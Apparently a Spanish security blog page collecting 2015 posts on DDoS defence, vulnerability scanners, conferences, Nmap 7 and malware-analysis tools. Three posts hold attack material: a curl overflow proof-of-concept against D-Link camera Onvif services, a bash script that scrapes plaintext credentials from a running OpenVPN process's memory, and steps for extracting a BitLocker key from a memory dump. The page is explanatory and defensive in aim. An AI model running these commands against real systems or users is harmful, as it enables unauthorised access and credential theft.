Bohatei: defensa flexible y dinámica contra ataques DDoS

Las defensas actuales contra ataques DDoS se basan en dispositivos de hardware caros y patentados desplegados en ubicaciones fijas. Esto introduce limitaciones clave con respecto a la flexibilidad (por ejemplo, enrutamiento complejo para conseguir llevar el tráfico a estos "cuellos de botella") y la elasticidad en el manejo de los cambios en los patrones de ataque.

Para abordar estas limitaciones utilizando nuevos paradigmas tales como redes definidas por software (SDN) y funciones de virtualización de red (NFV) han diseñado e implementado Bohatei, abordando los desafíos clave con respecto a la escalabilidad, capacidad de respuesta y la resistencia ante adversarios.

Las primeras evaluaciones muestran que Bohatei es escalable (maneja ataques de 500 Gbps), sensible (en un minuto es capaz de mitigar ataques) y resistente a los atacantes dinámicos.

 
Y lo mejor... en Github ya tenemos un repositorio con la primera versión de todos sus componentes: https://github.com/ddos-defense/bohatei


Recopilación de escáneres de vulnerabilidades web (+60 herramientas!)

Hoy en día es prácticamente indispensable realizar auditorías web periódicamente si queremos mantener la seguridad de un sitio que tenemos publicado en Internet. En SecTool Market tenemos un completísimo listado de herramientas todas ellas evaluadas mediante las plataformas RvR (Relative Vulnerability Rating), WAVSEP (Web Application Vulnerability Scanner Evaluation Projecty) y WAFEP (Web Application Firewall Evaluation Project).

A continuación mostramos el listado (en estricto órden alfabético) de todas las herramientas testeadas, aunque os recomiendo que os deis una vuelta por el sitio donde podréis ver varias tablas ordenadas según sus precios, características y tasas de detección.  Sinceramente, todas las que conocía y muchas más están en este indispensable recopilatorio:



#
LogoVulnerability ScannerVersionVendorLicense /
Technology

1
Acunetix WVS9.0 (GA)
Build 20140113
AcunetixCommercial
Unknown (Win32)

2
Acunetix WVS Free Edition8.0 (GA)
Build 20120509
AcunetixFreeware
Unknown (Win32)

3
aidSQL02062011 (Beta)
Build 255
LynxecGPL2
PHP

4
Ammonite1.2 (GA) RyscCorp.Commercial
.Net 2.0

5
Andiparos1.0.6 (GA) Compass Security AGGPL2
Java 1.5.x

6
arachni1.1 (GA) Tasos LaskosASF2/Commercial
Ruby 2.0.x

7
Burp Suite Professional1.5.20 (GA) PortSwiggerCommercial
Java 1.6.x

8
crawlfish0.92 (Beta)
Build 2
ericfishGPL2
.Net 1.1

9
Damn Small SQLi Scanner (DSSS)0.1h (Beta)
Build 0.1h+
Miroslav StamparGPL2
Python 2.6.x

10
Gamja1.6 (Beta) Sanghun JeonGPL
Perl 5.x

No te quedes sin entradas para la CON de Sevilla #secadmin2k15

El próximo 11 y 12 de diciembre tendrá lugar en Sevilla la segunda edición de Sec/Admin que tiene como objetivos:
 
- difundir, compartir y transmitir el conocimiento de los investigadores de seguridad o “hackers” a la comunidad, empresas del sector privado y público y a la propia Universidad, los avances, investigación e innovación que se han producido en el panorama español e internacional.

- impulsar el espíritu de “comunidad técnica de seguridad” fomentando la colaboración entre el público asistente, ponentes, empresas de los sectores privados y públicos y a la propia Universidad.

- consolidar y posicionar el evento dentro del panorama público nacional de Conferencias, Jornadas y Congresos de Seguridad como uno de los eventos “técnicos” más importantes en Andalucía. Brindando un punto de encuentro entre empresas y nuevos talentos. Y un canal dónde estos nuevos talentos puedan dan a conocer sus investigaciones.

Este año tienen grandes ponentes ya confirmados que impartirán charlas y talleres muy interesantes:
- Lorenzo Martínez - Memorias de un perito informático forense Vol.II
- Pablo González - Taller de pentesting powershell.
- Jaime Álvarez - Taller de Hardware Hacking y robótica.
- Ruth Sala y Abraham Pasamar - Cadena de custodia: Resolver el caso, depende de ti.
- Pedro Candel (S4urhon) - Intro to manual polymorphic shellcodes for fun & profit.
- Josep Albors - Ransomware: historia de una molesta amenaza.
- Rafael Otal (GoldraK) y Miguel Cotanilla - Taller: Pato con veneno de serpiente al ajillo.
- José Picó y David Pérez - Herramientas de ataque Wi-Fi para el mundo real.
- Jorge Bermúdez - La seguridad de sistemas informáticos y el nuevo Código Penal.
- Pablo San Emeterio - Watering-hole and Exploit Kits Hunting.
- Javier Soria - Análisis Forense
- Jorge Websec - Auditorias de Seguridad Web
- Quantika14 - Taller de seguridad en WordPress con WordPressa.
- Isaac Peña - Taller de detección de amenazas.

Hay dos de entradas. Una entrada General de 30,00 € y otra para estudiantes, profesores en 20,00 €. Puedes adquirir tu entrada aquí: http://secadmin2015.palbin.com/p1203527-entrada-general-para-el-congreso-secadmin-2k15.html

Además si vas en AVE tienen un acuerdo con Renfe con un 30% de descuento: http://www.secadmin.es/wp-content/uploads/2014/09/TES_2015_01690.pdf

VIDEO: https://www.youtube.com/watch?v=jXrIOxof250

Si necesitáis más información sobre alojamiento y transporte o el propio evento, lo podéis encontrar en la web de www.secadmin.es

Interior crea una red de hackers contra el terrorismo

Portada de El Mundo 24/11/2015
No suelo escribir artículos de opinión en el blog pero hoy quería hacerlo porque he visto una noticia en la portada del diario El Mundo que me ha llamado bastante la atención: "Antiterrorismo ficha a 'hackers' del Este contra el yihadismo".

En resumen, el Gobierno está creando "una red de expertos informáticos que permita blindar a España de ataques y que aporte datos para buscar a los responsables de la propaganda yihadista y los posibles ciberataques". Como resultado, Interior busca en las antiguas repúblicas soviéticas del Este contratar a algunos de los mejores hackers del mundo. Y mi pregunta es: ¿acaso no tenemos suficientes expertos en seguridad informática en nuestro país que tenemos que buscarlos fuera?

Entiéndame, no quiero que esta pregunta parezca ni por asomo xenófoba, es más, no se manejan estadísticas pero seguramente estos grandes fichajes no sean muy numerosos y debe ser una auténtica suerte poder trabajar y colaborar con ellos directamente. Sólo digo que en un país con más de 4 millones de parados el titular de esta noticia puede ser ciertamente ultrajante. Cualquiera que la lea fácilmente podría pensar "no hay trabajo aquí y encima tienen que traer hackers de fuera", como si no hubiera aquí suficiente talento ni programas de formación en seguridad informática.

Por eso, señores de el periódico El Mundo, podían haber usado otro titular y haber incluído ADEMÁS en la noticia información sobre alguna de las numerosas iniciativas de formación y reclutamiento que hay aquí en España, como por ejemplo la inminente CyberCamp. O quizás y además resaltar la gran cantidad de CON que se están organizando en muchas de nuestras ciudades, o hablar de algunos grupos de compañeros que YA participan y triunfan en CTFs por todo el mundo o de grandes profesionales que trabajan en multinacionales, muchos de los cuales ya imparten charlas en las más reconocidas y mediáticas conferencias de hacking internacionales. 


Sea como fuere, no esperes a que ningún gobierno cree un plan para formar y contratar nuevos hackers. Seas de donde seas toma la iniciativa, fórmate, investiga y se autodidacta. Quién sabe si mañana tú formarás parte de uno de estos grupos de expertos o lucharás contra ellos. 

¡Hackea el mundo!

Process-Dump: vuelca PE de Windows de memoria a disco

Una tarea recurrente de un analista de malware es volcar el código desempaquetado o inyectado de la memoria a disco para su posterior análisis estático con alguna herramienta como IDA o OllyDBG.

Con Process Dump 1.5 podrás hacerlo fácilmente en Windows y desde la línea de comandos. Funciona en 32 y 64 bits, utiliza un enfonque de importación y reconstrucción agresivo y permite volcar regiones de memoria sin cabeceras PE (en esos casos se generarán automáticamente junto con las tablas de importación).

Process Dump soporta también la creación y uso de una base de datos de hashes "limpios", por lo que el volcado de archivos limpios como kernel32.dll se puede omitir.

A continuación veremos algunos ejemplos de uso.

- Volcar todos los módulos de todos los procesos (ignorando los módulos limpios conocidos):

     pd64.exe -system

- Volcar todos los módulos de un identificador de proceso específico:

   pd64.exe -pid 0x18A

- Volcar todos los módulos de un nombre de proceso:

   pd64.exe -p .chrome.

- Crear una base de datos de hashes "limpios". Estos hashes serán usados para excluir algunos módulos del volcado con el siguiente comando:

    pd64.exe -db gen

- Volcar el código de una dirección específica en el PID PID 0x1a3:

    pd64.exe -pid 0x1a3 -a 0xffb4000
   
    Esto genererá dos ficheros (de 32 y 64 bits) con la cabeceras del PE y tabla de importación generada que pueden ser cargados para analizarlos con IDA: notepad_exe_x64_hidden_FFB40000.exe notepad_exe_x86_hidden_FFB40000.exe
   
Descargar archivo ejecutable para Windows 32 y 64 bit: pd_latest (100.32 KB)
o puede construirse utilizando Visual Studio aquí.

Fuentes

http://split-code.com/processdump.html
https://github.com/glmcdona/Process-Dump

Llega la versión 7 de Nmap

Llevo mucho tiempo trabajando en seguridad perimetral y comunicaciones y utilizo Nmap casi a diario, así que no puedo dejar pasar la oportunidad de hacerme eco de la publicación de la versión 7.00 del escáner de redes de facto, ya disponible en https://nmap.org/

Se trata del producto de tres años y medio de trabajo, cerca de 3200 commits en el código y más de una docena de revisiones desde el lanzamiento de la anterior release 6 en mayo de 2012.

Podéis ver un listado detallado de todos los cambios, aunque los 7 más significativos en la nueva versión 7 de Nmap son:

1. Expansión de Nmap Scripting Engine (NSE)

Como el núcleo de Nmap ha madurado, se han desarrollado más y más funcionalidades como parte de del subsistema de NSE. De hecho, se han añadido 167 nuevos scripts y 20 librerías desde Nmap 6. Por ejemplo firewall bypass, Supermicro-ipmi-conf, oracle-brute-stealth y ssl-heartbleed. Y NSE es ahora lo suficientemente potente que incluso los scripts pueden asumir funciones básicas tales como el descubrimiento de hosts (dns-ip6-arpa-scan), escaneo de versiones (ike-versión, snmp-info, etc.) y grinding RPC (rpc-grind) . Incluso hay una propuesta para implementar el escaneo de puertos mediante el NSE. [Más detalles]
   
2. Soporte IPv6 más maduro

Las mejoras de escaneos en IPv6 fueron una de las grandes mejoras de la release 6 de Nmap, pero Nmap 7 supera todas ellas con soporte completo de IPv6 para rangos de direcciones estilo CIDR, idle scans, resoluciones inversas de DNS en paralelo, y más cobertura de scripts NSE. [Más detalles]

VolatilityBot: extracción automática de código malicioso mediante Volatility

Continuamos aumentando nuestro arsenal para el análisis y reversing de malware y esta vez nos ha llamado la atención VolatilityBot de de @MartinKorman, un pequeño sistema de código abierto para automatizar el proceso de extracción y análisis estático mediante el framework de Volatility. Básicamente lo que hace es lo siguiente:

- ejecuta el malware en una máquina virtual.
- espera un período predefinido de tiempo.
- suspende la máquina virtual.
- compara el snapshot con una imagen original de la máquina virtual, encuentra nuevos procesos, código inyectado, archivos DLL cargados o módulos del kernel, los vuelca desde la memoria y prepara el archivo PE con el fin de hacer más fácil el análisis estático.

Todos los metadatos se guardan en una base de datos SQLite. Los volcados de memoria se guardan en el almacenamiento configurado. Todos los archivos PE pasan un análisis estático breve y los informes se guardan también. Teóricamente VolatilityBot puede manejar una cantidad ilimitada de máquinas virtuales, dependiendo del rendimiento del PC. Actualmente no tiene ninguna interfaz de usuario, pero se puede acceder a la base de datos SQLite mediante una herramienta con interfaz gráfica, como sqlitebrowser en Mac OS o Sqliteman en Linux. En futuras versiones habrá una pequeña interfaz de usuario web en la que se podrán presentar nuevas muestras y leer los informes ya existentes.

Con el fin de evitar la detección de VM, se utilizan también algunos trucos:

- Limpieza de claves de registroa (todo lo relacionado con VMware, hay una gran cantidad de información en Internet sobre este tema).
- Una macro que mueve el ratón y ejecuta el malware.
- Por supuesto, no hay herramientas de VMware en la máquina.

A continuación podéis ver un vídeo de dos máquinas virtuales procesando tres muestras:

  

Documentación e instrucciones de instalación: https://bitbucket.org/martink90/volatilitybot_public/downloads/Documentation_Final.pdf

Código fuente: https://bitbucket.org/martink90/volatilitybot_public
 
Presentación de la VB2015:: https://www.virusbtn.com/pdf/conference_slides/2015/Korman-VB2015.pdf

Vulnerabilidad en cámaras D-Link (servicio Onvif) permite el acceso remoto como root

Hace una semana @rpaleari y @joystick publicaron una vulnerabilidad de desbordamiento de búfer (stack) que afecta al servicio Onvif de las cámaras D-Link el cual es accesible por la WAN sin autenticación. En otras palabras, la vulnerabilidad puede explotarse remotamente y usuarios no autenticados pueden ganar acceso como root en los dispositivos afectados.

Concretamente el problema está en la llamada a la función vsprintf(str, "%s", input) donde str es una variable de tamaño fijo e input es el búfer de solicitud de entrada controlado por el atacante. Un atacante puede sobrescribir un puntero en la pila (por ejemplo, el registro guardado lr) para secuestrar el flujo de ejecución.

La función vulnerable vsprintf() es llamada por BaseCgilet::Term() (desde libcgilet.so). A continuación, se lanza el exploit en Soaplet::onUpdateSettings(), que a su vez llama a BaseCgilet::Term() cuando un documento XML no puede ser parseado correctamente. También podrían existir otras rutas en el código que lleven a la llamada a la función vulnerable.

Podemos llevar a cabo una PoC mediante el siguiente comando:

curl -d @poc-crash.xml -k -v https://<target IP>/onvif/device_service --header 'Content-Type: application/soap+xml; charset=utf-8; action="http://www.onvif.org/ver10/device/wsdl/GetSystemDateAndTime"'

El xml poc-crash.xml es tan sencillo como esto:

<s:Envelope xmlns:s="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAXXXX">

Material de la BlackHat Europe 2015

Ya tenemos el material de la conferencia BlackHat 2015 en Europa, que este año volvía a Amsterdan y que tuvo lugar del 10 al 13 de noviembre:

pres= presentation
wp= white paper 

- What Got Us Here Wont Get Us There - pres
- (In-)Security of Backend-As-A-Service - pres - wp
- A Peek Under the Blue Coat - pres
- All Your Root Checks Belong to Us: The Sad State of Root Detection
- AndroBugs Framework: An Android Application Security Vulnerability Scanner - pres
- Attacking the XNU Kernel in El Capitain - pres
- Authenticator Leakage through Backup Channels on Android - pres
- Automating Linux Malware Analysis Using Limon Sandbox - pres - wp
- Breaking Access Controls with BLEKey
- Bypassing Local Windows Authentication to Defeat Full Disk Encryption - pres - wp
- Bypassing Self-Encrypting Drives (SED) in Enterprise Environments- pres - wp
- Commix: Detecting and Exploiting Command Injection Flaws - pres - wp
- Continuous Intrusion: Why CI tools are an Attackers Best Friends - pres
- Cybercrime in the Deep Web - pres - wp
- Cybersecurity for Oil and Gas Industries: How Hackers Can Manipulate Oil Stocks - pres - wp
- Defending Against Malicious Application Compatibility Shims - pres - wp
- Even the LastPass Will be Stolen Deal with It! - pres
- Exploiting Adobe Flash Player in the Era of Control Flow Guard - pres
- Faux Disk Encryption: Realities of Secure Storage on Mobile Devices - pres - wp
- Fuzzing Android: A Recipe for Uncovering Vulnerabilities Inside System Components in Android - pres - wp
- Going AUTH the Rails on a Crazy Train - pres  - wp
- Hey Man Have You Forgotten to Initialize Your Memory? - pres - wp
- Hiding in Plain Sight - Advances in Malware Covert Communication Channels - pres - wp
- How to Break XML Encryption - Automatically - wp
 -Implementing Practical Electrical Glitching Attacks
- Is Your TimeSpace Safe?  - Time and Position Spoofing Opensourcely - pres - wp
- Lessons from Defending the Indefensible - pres
- Locknote: Conclusions and Key Takeaways from Black Hat Europe 2015
- LTE & IMSI Catcher Myths - pres - wp
- New (and Newly-Changed) Fully Qualified Domain Names:  A View of Worldwide Changes to the Internets DNS - pres
- New Tool for Discovering Flash Player 0-day Attacks in the Wild from Various Channels - pres - wp
- Panel: What You Need to Know About the Changing Regulatory Landscape in Information Security
- Self-Driving and Connected Cars: Fooling Sensors and Tracking Drivers - pres - wp1 - wp2
- Silently Breaking ASLR in the Cloud - pres - wp
- Stegosploit - Exploit Delivery with Steganography and Polyglots - pres
- Triaging Crashes with Backward Taint Analysis for ARM Architecture - pres
- Unboxing the White-Box: Practical Attacks Against Obfuscated Ciphers - pres - wp
- VoIP Wars: Destroying Jar Jar Lync - pres
- Vulnerability Exploitation in Docker Container Environments - pres - wp
- Watching the Watchdog: Protecting Kerberos Authentication with Network Monitoring - pres - wp
- Your Scripts in My Page - What Could Possibly Go Wrong?

El sistema de actualización de Eset Smart Security o como te pueden robar una licencia

El antivirus en un software fundamental dentro de cualquier sistema informático ya sea el de un usuario común o el de una gran empresa, existen muchas soluciones para los dos tipos.
Una de las empresas que fabrican este tipo de soluciones es Eset, que cuenta con varios productos tanto para el hogar como para las empresas.

Después de haber adquirido uno de sus productos, para ser más específico Eset Smart Security cuyo costo es de $59.99,  me ha llamado mucho la atención la forma como actualiza su base de firmas de virus.


Ya que cuando se realiza una actualización se envían peticiones http (sin ningún tipo de cifrado) con el usuario y la contraseña de la licencia adquirida. Esto conlleva que, con un simple sniffer, se pueden robar licencias.


Para agravar un poco más el problema, Eset también envía peticiones por http para obtener los datos de la licencia (fecha de expiración, tipo de licencia, etc), así que además brinda información para saber que licencia conviene robar:


Y también muestra información sobre el sistema operativo.


Meditando sobre todo aquello, me he puesto a pensar qué otros peligros más pueden existir. De momento se me ocurre por ejemplo un ataque de fuerza bruta para obtener licencias válidas:


En conclusión es fácil y simple perder una licencia de un valor de $59.99 o más y, ya que Eset se actualiza automáticamente, solo basta estar conectado a una red wifi y que alguien por ahí esté esnifando, que por cierto para realizarlo no se requiere ser un experto informático ya que existen herramientas automatizadas como Caín & Abel .
No estoy seguro si sus otros productos usaran el mismo mecanismo pero lo más seguro es que sí, quizás usando este fallo es que web como http://licenciaseset2014.blogspot.pe/ tienen una larga lista de licencias.

Para terminar voy a decir que me siento profundamente impresionado de que un antivirus tan popular permita que las licencias adquiridas de sus productos viajen libremente por la red sin ningún tipo de cifrado, así que ya saben, si son usuarios de Eset asegúrense de desactivar las actualizaciones automáticas cuando estén conectados a una red pública. 

Ahiezer Alvarez - https://www.facebook.com/ahiezer.alvarestalla

Nota de ESET:
El problema de la validación de usuario y contraseña bajo tráfico http es un problema conocido por ESET. Tan conocido que en la última versión , en la versión VIGENTE del producto, en concreto la 9 para Nod32 y Smart Security, el tráfico se realiza mediante HTTPS.
Recomendamos a todos los usuarios de nuestros productos a actualizar a la última versión. 

Extrayendo la clave de BitLocker (FVEK) en memoria para acceder a un volumen NTFS cifrado

Recientemente se ha publicado un plugin para Volatility que facilita la identificación y extracción de FVEKs (Full Volume Encryption Keys) que pueden ser usadas para descifrar volúmenes BitLocker. Actualmente sólo se soportan imágenes de Windows Vista/7.


En el siguiente ejemplo, el que se muestra en la página del proyecto de Github, se descifrará el binario de una imagen de un disco duro (John_HDD.dd) obteniendo la clave mediante un volcado de memoria del equipo (John_Win7SP1x64.raw).

1) Primero determinamos el offset del volumen cifrado BitLocker. En este caso está en la segunda partición NTFS a partir del sector 718848. Fíjate en la firma "-FVE-FS-".

$ mmls John_HDD.dd
DOS Partition Table
Offset Sector: 0
Units are in 512-byte sectors

     Slot    Start        End          Length       Description
00:  Meta    0000000000   0000000000   0000000001   Primary Table (#0)
01:  -----   0000000000   0000002047   0000002048   Unallocated
02:  00:00   0000002048   0000718847   0000716800   NTFS (0x07)
03:  00:01   0000718848   0031455231   0030736384   NTFS (0x07)
04:  -----   0031455232   0031457279   0000002048   Unallocated
$
$ hexdump -C -s $((718848*512)) -n 16 John_HDD.dd
15f00000  eb 58 90 2d 46 56 45 2d  46 53 2d 00 02 08 00 00  |.X.-FVE-FS-.....|
15f00010

2) Luego usamos el plugin bitlocker para extraer la FVEK. Es conveniente usar el argumento opcional --dump-dir para especificar el directorio en el cual se guardarán el cipher ID (primeros 2 bytes) y la FVEK (64 bytes).

$ export VOLATILITY_LOCATION=file://./John_Win7SP1x64.raw
$ export VOLATILITY_PROFILE=Win7SP1x64
$
$ python vol.py bitlocker --dump-dir ./keys
Volatility Foundation Volatility Framework 2.5

Cipher: AES-128 + Elephant diffuser (0x8000)
FVEK: 2140c8afcbb835127b3b5b97fdcc8b846b7d97fba0c5a2e9dbfef97e263272fa4543af87702c4cee4252eaaa0b7fdc2a96c54aace6e90642a4bbece8afc430c2
FVEK dumped to: ./keys/0xfa80018fe8c0.fvek

3) Finalmente usamos la FVEK extraída para descifrar el volumen usando fuse-dislocker, una utilidad para montar volúmenes BitLocker en Linux.

$ sudo dislocker-fuse -V John_HDD.dd -k ./keys/0xfa80018fe8c0.fvek -o $((718848*512)) -- /mnt/ntfs
$
$ sudo mount -o loop,ro /mnt/ntfs/dislocker-file /mnt/clear
$
$ ls -lh /mnt/clear
total 730M
lrwxrwxrwx 2 root root   60 Jul 14  2009 Documents and Settings -> /mnt/clear/Users
-rwxrwxrwx 1 root root 730M Nov  4 09:39 pagefile.sys
drwxrwxrwx 1 root root    0 Jul 13  2009 PerfLogs
drwxrwxrwx 1 root root 4.0K Nov  4 09:58 ProgramData
drwxrwxrwx 1 root root 4.0K Apr 12  2011 Program Files
drwxrwxrwx 1 root root 4.0K Nov  4 07:01 Program Files (x86)
drwxrwxrwx 1 root root    0 Nov  4 07:04 Recovery
drwxrwxrwx 1 root root    0 Nov  4 09:57 $Recycle.Bin
drwxrwxrwx 1 root root 4.0K Nov  4 07:05 System Volume Information
drwxrwxrwx 1 root root 4.0K Nov  4 09:56 Users
drwxrwxrwx 1 root root  24K Nov  4 09:58 Windows

Fuente: https://github.com/elceef/bitlocker

Un pequeño gadget que detecta y avisa del uso de Mimikatz en la red

Mimikatz es quizás una de las herramientas ofensivas más importantes en la actualidad. Dadas sus capacidades, mucha gente está interesada en la forma de detectar su uso en la red.

Por ejemplo, cierta entrada en un blog recomienda el uso de Honey Hashes para detectar el uso mimikatz. Otros podrían recomendar buscar tickets Kerberos que caducan dentro de 10 años. Estos son dos grandes ejemplos de formas de detectar diferentes características de Mimikatz. ¿Y si te dijera que hay una manera de detectar el uso mimikatz, independientemente de la función?

Esta tecnología existe. Y lo mejor, es barata: sólo cuesta unos $50 en Amazon. El periférico de detección de Mimikatz en cuestión es un dispositivo Busylight, que es un simple gadget con sonido y una pequeña linterna de varios colores que podremos configurar para que se enciendan según los eventos que queramos. A partir del 9 de octubre se introdujo un commit en el repositorio del proyecto de Mimikatz que detecta y activa estos dispositivos que pueden alertarnos.


Aquí tienes una demostración de esta tecnología en acción:


Fuente: Revolutionary Device Detects Mimikatz Use

Usando una impresora como vector de ataque para insertar código malicioso

Las impresoras, especialmente las de la marca Lexmark, tienen en su configuración la posibilidad de personalizar y editar enlaces. El usuario puede insertar libremente un enlace no estándar a través de un formulario.
Esta característica se puede encontrar a través de una página html, accediendo por la red local de la impresora. Por ejemplo, en: configuración, redes y gateways, configuración de enlace personalizado.

No hay duda acerca de la interactividad con el usuario, ya que el fabricante cuenta con una interfaz fácil e intuitiva.
Sin embargo, puede ser una puerta de entrada a un backdoor, o a algún código malicioso si alguien malintencionado puede acceder a los ajustes, ya sea por falta de cuidado con la seguridad o por otros medios de acceso.

Infectando al objetivo

La técnica es muy sencilla, se trata de hacer que el usuario acceda a los enlaces personalizados, que contienen el código malicioso establecido previamente.

En las pruebas se utilizó un script y un exploit para la conexión inversa.
Convencer al usuario para que acceda a los enlaces puede hacerse de diversas maneras, algunas de ellas:

Para descubrir la dirección de correo registrada en la impresora:
Configuraciones, Administrar accesos directos, Configuración de acceso directo, Correo electrónico:


Otra forma de descubrir la dirección de correo electrónico:

Configuraciones, Importar / Exportar, Exportar Archivos de acceso directo.

"Vacuna" contra la última versión de CryptoWall

Recientemente ha aparecido una nueva variante de CryptoWall, la 4.0, uno de los ransomwares más conocidos que infecta máquinas Windows, cifra los archivos y exige a sus víctimas un pago mediante cripto-monedas para desbloquear sus documentos. Se cree que esta variante ha sido desarrollada por hackers rusos y quizás el cambio más significativo de esta nueva versión es que ahora incluso cifra los nombres de archivo (por ej. 27p9k967z.x1nep o 9242on6c.6la9) lo que hace aún más difícil recuperar la información. 


A parte de eso, y de nuevos mensajes de bienvenida como el de la imagen de arriba (¡qué cachondos!), continua usando RC4 para comunicarse con los servidores C&C, sigue asignando un hash MD5 para cada "usuario", se inyecta en Explorer.exe, desactiva la restauración del sistema, borra las shadow volumen copies y usa bcdedit para desactivar la reparación de inicio de Windows; una auténtica joya...

Pero lo curioso es que la firma de antivirus rumana BitDefender anunció el lunes que ha desarrollado una "vacuna" que puede evitar que un usuario se infecte con este malware, una vacuna que simplemente simula que se está utilizando un teclado configurado para el idioma ruso, pues parece que el malware realiza tal comprobación antes de proceder a la infección/cifrado de archivos. Al menos eso es lo que observaron en las infecciones en los EE.UU.; en muchos países europeos occidentales como Francia, Italia, Alemania y España; y en la India y China.

Evidentemente la herramienta, que se puede descargar de forma gratuita desde su página, es sólo preventiva. Es decir, no deshace el daño si el malware ya ha infectado a una máquina, y sólo se aplica a la última versión 4 de Cryptowall.

Fuentes:

- Bitdefender Offers Free CryptoWall Vaccine
- This free fix will stop Cryptowall 4 from holding your PC hostage
- CryptoWall 4.0 released with new Features such as Encrypted File Names
- Cryptowall 4.0: Update makes world's worst ransomware worse still
- Security Alert: CryptoWall 4.0 – new, enhanced and more difficult to detect

Obteniendo contraseñas en claro de OpenVPN bajo Windows (RAM scraping)

No hace mucho me llamó la atención un pequeño script en bash que podía obtener las credenciales en texto claro de cualquier proceso OpenVPN en Linux:
#!/bin/bash
# This little hack-job will grab credentials from a running openvpn process in Linux
# Keep in mind this won't work if the user used the --auth-nocache flag

grep rw-p /proc/$1/maps | sed -n 's/^\([0-9a-f]*\)-\([0-9a-f]*\) .*$/\1 \2/p' | while read start stop; do gdb --batch-silent --silent --pid $1 -ex "dump memory $1-$start-$stop.dump 0x$start 0x$stop"; done
echo "Your credentials should be listed below as username/password"

strings *.dump | grep -B2 KnOQ  | grep -v KnOQ
rm *.dump --force

Cómo veis, primero obtiene un volcado de memoria del proceso con gdb, luego saca las cadenas de texto del binario con string y finalmente con grep muestra las dos lineas anteriores al patrón 'KnOQ', que es donde se sitúa la contraseña. Así de directo.

Esta técnica, que básicamente consiste en buscar texto en claro dentro de volcados memoria de procesos, es conocida como RAM scraping y viene utilizándose desde hace años. De hecho, se hizo sobretodo famosa por malware como "Dexter", "BlackPOS" o "TrackR" que la utilizaban para atacar a terminales de punto de venta (TPV, o PoS en inglés) y robar información de tarjetas de crédito/débito. Como podéis imaginar, los números de las tarjetas de pago tienen el mismo formato y pueden buscarse e identificarse fácilmente mediante el mismo patrón.

Más adelante escribiremos algún que otro artículo para proteger específicamente TPVs, pero ahora vamos a hacer un ejercicio práctico para obtener las contraseñas en claro de OpenVPN mediante esta técnica, esta vez en Güindous. Así que, si tenéis alguna VPN funcionando en el sistema operativo del tío Bill, estar atentos.

YaVol, un interfaz gráfico para Volatility y Yara

YaVol es un GUI escrito en Python para Volatility y Yara que nos puede hacer la vida algo más fácil, sobretodo si estamos estudiando un incidente o realizando un análisis forense y necesitamos hacer un examen rápido de un volcado la memoria. Los resultados se almacenan en una base de datos sqlite para su reutilización.


Para usarlo simplemente necesitamos tener instalado Python (2.7), PyQt4 y sqlite3 y clonar el repositorio:

git clone https://Ft44k@bitbucket.org/Ft44k/yavol.git

El directorio por defecto para las firmas de Yara es /yara_rules.
La licencia es GPLv3.  


Enjoy it!

Fuente: https://bitbucket.org/Ft44k/yavol/

Material de la conferencia SecTor 2015

SecTor es probablemente la conferencia anual de seguridad más importante de Canadá. Curiosamente sus fundadores fueron TASK, uno de los grupos de usuarios de seguridad TI más grande y de mayor éxito de América del Norte, que decidió llevar este evento a dicho país.
Después de un tiempo, SecTor se ha ganado una gran reputación reuniendo expertos de todo el mundo para compartir sus últimas investigaciones y técnicas. Por eso, año a año, conviene no perder de vista el contenido de sus charlas y presentaciones:


Media File
Presentation File
Tools
"Welcome to SecTor 2015" - Brian Bourne


Big Data Needs Big Privacy ... Enter Privacy by Design - Dr. Ann Cavoukian Media File Presentation File
IT Security Operations: Successful Transformation - Kristin Lovejoy Media File
Globalization of Cybercrime - Jason Brown
Maturing InfoSec: Lessons from Aviation on Information Sharing - Trey Ford Media File  Presentation File




IT Security Experts Canada Toronto SecTor - Technical Track
Media File
Presentation File
Tools
Automation is your Friend: Embracing SkyNet to Scale Cloud Security - Mike Rothman Media File
Breaking Access Controls with BLEKey - Mark Bassegio and Eric Evenchick